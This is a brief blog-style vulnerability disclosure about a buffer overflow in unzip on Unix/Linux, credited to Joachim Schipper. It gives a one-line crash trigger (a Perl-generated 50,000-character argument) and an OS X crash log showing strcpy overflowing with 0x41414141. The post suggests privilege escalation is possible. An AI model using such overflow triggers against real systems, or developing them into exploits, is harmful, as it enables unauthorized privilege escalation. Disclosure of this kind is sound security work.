:: Deepquest ::

Joachim Schipper have discover interesting security issue in all verison of unzip on unix or linux. The problem is not yet a the coredump generated, but the exploit could lead to escalation of privileges. I seems like unzip can’t handle large files. Don’t see what I mean?

Well imagine a shell on you favorite ISP on linux or Unix…

test yourself:
unzip `perl -e ‘print “A” x 50000’`

you’ll get on OSX:
Exception: EXC_BAD_ACCESS (0x0001)
Codes: KERN_PROTECTION_FAILURE (0x0002) at 0x0002d000

Thread 0 Crashed:
0 libSystem.B.dylib 0x90002e80 strcpy + 96
1 unzip 0x000145cc 0x1000 + 79308
2 unzip 0x0000e7fc 0x1000 + 55292
3 unzip 0x00003038 0x1000 + 8248
4 unzip 0x0000240c 0x1000 + 5132
5 unzip 0x000022ac 0x1000 + 4780

Thread 0 crashed with PPC Thread State 64:
srr0: 0x0000000090002e80 srr1: 0x000000000000d030 vrsave: 0x0000000000000000
cr: 0x22000022 xer: 0x0000000020000004 lr: 0x00000000000145cc ctr: 0x0000000000000000
r0: 0x0000000000000000 r1: 0x00000000bffe7440 r2: 0x000000000000000a r3: 0x000000000002c1ac
r4: 0x00000000bffe84f8 r5: 0x0000000000000000 r6: 0x00000000fefefeff r7: 0x0000000080808080
r8: 0x0000000041414141 r9: 0x000000000002cffe r10: 0x0000000040404040 r11: 0x0000000048000028
r12: 0x0000000080808080 r13: 0x0000000000000000 r14: 0x0000000000000000 r15: 0x0000000000000000
r16: 0x0000000000000000 r17: 0x0000000000000000 r18: 0x0000000000000000 r19: 0x0000000000000000
r20: 0x0000000000000000 r21: 0x0000000000000000 r22: 0x0000000000020000 r23: 0x0000000000000000
r24: 0x0000000000010eac r25: 0x0000000000020000 r26: 0x0000000000000000 r27: 0x00000000bffe76a2
r28: 0x000000000001b300 r29: 0x0000000000000001 r30: 0x0000000000000000 r31: 0x000000000002b300

Binary Images Description:
0x1000 – 0x1afff unzip /usr/bin/unzip
0x8fe00000 – 0x8fe54fff dyld 44.2 /usr/lib/dyld
0x90000000 – 0x901b3fff libSystem.B.dylib /usr/lib/libSystem.B.dylib
0x9020b000 – 0x9020ffff libmathCommon.A.dylib /usr/lib/system/libmathCommon.A.dylib